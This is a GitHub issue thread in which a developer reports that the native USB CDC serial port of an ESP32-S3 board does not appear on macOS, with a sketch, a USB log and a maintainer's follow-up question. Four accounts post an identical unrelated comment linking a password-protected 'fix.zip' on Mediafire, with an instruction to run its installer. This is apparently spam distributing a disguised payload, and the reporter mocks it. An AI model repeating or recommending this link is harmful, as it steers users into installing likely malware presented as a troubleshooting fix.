espressif/arduino-esp32 #10244: USB CDC Serial not appearing on macOS

maciekish, 2024-08-26:
### Board

esp32-s3-devkitc-1

### Device Description

esp32-s3-devkitc-1

### Hardware Configuration

Both USB OTG and UART connected to macOS via separate USB cables. 

### Version

v3.0.4

### IDE Name

Arduino IDE & PlatformIO

### Operating System

macOS 15.1

### Flash frequency

80Mhz

### PSRAM enabled

no

### Upload speed

460800

### Description

USB OTG port does not appear on macOS, i have tried -DARDUINO_USB_MODE=1 -DARDUINO_USB_CDC_ON_BOOT=1 in PlatformIO and the following in Arduino IDE:

[image]

This is all i get, usbserial-110 is the UART i use for programming, no OTG port...

[image]

### Sketch

```cpp
#include <Arduino.h>

// MAX7219
#define HARDWARE_TYPE MD_MAX72XX::GENERIC_HW
#define MAX_DEVICES 1
#define CLK_PIN   36  // or SCK
#define DATA_PIN  35  // or MOSI
#define CS_PIN    40  // or SS
#include <MD_MAX72xx.h>

MD_MAX72XX mx = MD_MAX72XX(HARDWARE_TYPE, DATA_PIN, CLK_PIN, CS_PIN, MAX_DEVICES);

void setup() {
  Serial.begin(115200);
  
  if (!mx.begin())
    Serial.println("MCP7219 Failed to Initialize!");
  else
    Serial.println("MCP7219 Initialized");

  mx.clear();
[... 88 lines cut ...]

[2386336.687044]: IOPort::_updateAuthorizationState(): [Port-USB-C@1] Updating authorization state...

[2386336.687051]: IOServiceNotificationManager::sendMessages(): [Port-USB-C@1/USB2] Sending message type 0xe0000130 from service USB2@...

[2386336.687055]: IOPort::_updateAuthorizationState_block_invoke(): [Port-USB-C@1] authorizationRequired: YES -> YES, authorizationPending: YES -> YES, userAuthorizationPending: NO -> NO, supervisedTransportActive: YES -> YES

[2386336.687061]: IOServiceNotificationManager::sendMessages(): [Port-USB-C@1] Sending 2 message(s)... (m_propertyChanged: YES)

[2386336.687066]: IOServiceNotificationManager::sendMessages(): [Port-USB-C@1] Sending message from service Port-USB-C@1... (type: 0xe3ff80ca, arg: 0, argSize: 0)

[2386336.687305]: IOServiceNotificationManager::sendMessages(): [Port-USB-C@1] Sending message type 0xe0000130 from service Port-USB-C@1...

[2386336.687332]: IOPort::_copyOrRemoveTransportFromDict_block_invoke(): [Port-USB-C@1] No transports found! (transportType: 4 [CIO])

[2386336.687384]: IOPort::copyTransports_block_invoke(): [Port-USB-C@1] No transports found! (transportType: 4 [CIO])

[2386336.687391]: IOPort::_copyOrRemoveTransportFromDict_block_invoke(): [Port-USB-C@1] No transports found! (transportType: 4 [CIO])

[2386336.687405]: IOPort::copyTransports_block_invoke(): [Port-USB-C@1] No transports found! (transportType: 4 [CIO])
```

### I have checked existing issues, online documentation and the Troubleshooting Guide

- [X] I confirm I have checked existing issues, online documentation and Troubleshooting guide.

Superming997, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

lyscop, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ChangjingZhang, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

xiaobai-marker, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

maciekish, 2024-08-26:
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Sure 😂

SuGlider, 2024-08-26:
@me-no-dev | @P-R-O-C-H-Y : Could you please help with this macOS issue?

me-no-dev, 2024-08-27:
Are both USB ports part of the board or have you attached the USB port directly to the pins?

closed 2025-03-12 by Jason2866